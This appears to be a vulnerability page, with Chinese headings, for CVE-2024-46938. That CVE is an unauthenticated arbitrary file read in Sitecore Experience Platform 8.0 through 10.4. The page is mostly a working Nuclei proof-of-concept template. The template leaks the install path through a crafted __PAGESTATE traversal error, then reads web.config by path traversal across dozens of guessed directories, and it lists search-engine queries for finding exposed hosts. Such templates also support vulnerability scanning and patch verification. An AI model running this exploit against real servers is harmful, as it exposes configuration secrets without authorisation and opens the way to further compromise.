漏洞描述
An issue was discovered in Sitecore Experience Platform (XP), Experience Manager (XM), and Experience Commerce (XC) 8.0 Initial Release through 10.4 Initial Release. An unauthenticated attacker can read arbitrary files.
CVE-2024-46938: Sitecore Experience Platform <= 10.4 - Arbitrary File Read
PoC代码[已公开]
id: CVE-2024-46938
info:
name: Sitecore Experience Platform <= 10.4 - Arbitrary File Read
author: DhiyaneshDK
severity: high
description: |
An issue was discovered in Sitecore Experience Platform (XP), Experience Manager (XM), and Experience Commerce (XC) 8.0 Initial Release through 10.4 Initial Release. An unauthenticated attacker can read arbitrary files.
reference:
- https://www.assetnote.io/resources/research/leveraging-an-order-of-operations-bug-to-achieve-rce-in-sitecore-8-x---10-x
- https://nvd.nist.gov/vuln/detail/CVE-2024-46938
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-46938
epss-score: 0.92442
epss-percentile: 0.99724
cpe: cpe:2.3:a:sitecore:experience_commerce:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 45
vendor: sitecore
product: experience_commerce
shodan-query: http.title:"sitecore"
fofa-query: title="sitecore"
google-query: intitle:"sitecore"
tags: cve,cve2024,sitecore,lfi,rce,vkev
flow: http(1) && http(2) && http(3)
http:
- method: GET
path:
- "{{BaseURL}}/-/media/doo-doo.ashx"
host-redirects: true
matchers:
- type: word
part: location
words:
- "/sitecore/service/notfound.aspx"
internal: true
- raw:
- |
POST /-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.ValidateXHtml?hdl=a HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__PAGESTATE=/../../x/x
matchers:
- type: word
part: body
words:
- "Could not find a part of the path"
internal: true
extractors:
- type: regex
name: file_path
group: 1
regex:
- Could not find a part of the path '([^']+)\\x\\x\.txt
internal: true
- raw:
- |
GET /-/speak/v1/bundles/bundle.js?f={{paths}}sitecore\shell\client\..\..\..\web.config%23.js HTTP/1.1
Host: {{Hostname}}
payloads:
paths:
- '{{file_path}}\'
- 'C:\inetpub\wwwroot\sitecore\'
- 'C:\inetpub\wwwroot\sitecore1\'
- 'C:\inetpub\wwwroot\sxa\'
- 'C:\inetpub\wwwroot\XP0.sc\'
- 'C:\inetpub\wwwroot\Sitecore82\'
- 'C:\inetpub\wwwroot\Sitecore81\'
- 'C:\inetpub\wwwroot\Sitecore81u2\'
- 'C:\inetpub\wwwroot\Sitecore7\'
- 'C:\inetpub\wwwroot\Sitecore8\'
- 'C:\inetpub\wwwroot\Sitecore70\'
- 'C:\inetpub\wwwroot\Sitecore71\'
- 'C:\inetpub\wwwroot\Sitecore72\'
- 'C:\inetpub\wwwroot\Sitecore75\'
- 'C:\Websites\spe.dev.local\'
- 'C:\inetpub\wwwroot\SitecoreInstance\'
- 'C:\inetpub\wwwroot\SitecoreSPE_8\'
- 'C:\inetpub\wwwroot\SitecoreSPE_91\'
- 'C:\inetpub\wwwroot\Sitecore9\'
- 'C:\inetpub\wwwroot\sitecore93sc.dev.local\'
- 'C:\inetpub\wwwroot\Sitecore81u3\'
- 'C:\inetpub\wwwroot\sitecore9.sc\'
- 'C:\inetpub\wwwroot\sitecore901xp0.sc\'
- 'C:\inetpub\wwwroot\sitecore9-website\'
- 'C:\inetpub\wwwroot\sitecore93.sc\'
- 'C:\inetpub\wwwroot\'
- 'C:\inetpub\{{Hostname}}.sc\'
- 'C:\inetpub\{{FQDN}}.sc\'
- 'C:\inetpub\{{RDN}}.sc\'
- 'C:\inetpub\{{FQDN}}\'
- 'C:\inetpub\{{RDN}}\'
- 'C:\inetpub\{{Hostname}}\'
- 'C:\inetpub\{{Hostname}}.sitecore\'
- 'C:\inetpub\{{FQDN}}.sitecore\'
- 'C:\inetpub\{{RDN}}.sitecore\'
- 'C:\inetpub\{{Hostname}}.website\'
- 'C:\inetpub\{{FQDN}}.website\'
- 'C:\inetpub\{{RDN}}.website\'
- 'C:\inetpub\{{Hostname}}.dev.local\'
- 'C:\inetpub\{{FQDN}}.dev.local\'
- 'C:\inetpub\{{RDN}}.dev.local\'
- 'C:\inetpub\{{Hostname}}sc.dev.local\'
- 'C:\inetpub\{{FQDN}}sc.dev.local\'
- 'C:\inetpub\{{RDN}}sc.dev.local\'
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'contains(body, "<configuration>")'
- 'contains(content_type, "text/javascript")'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450221009795a5b5f8bbf9fd8ee4785368e61eecfd13d3c8c7d0a0edcff9082739f41958022063c44b3172dd4035fb10653c608c962cb79549f7e479a8f7094bbf044ea4009a:922c64590222798bb761d5b6d8e72950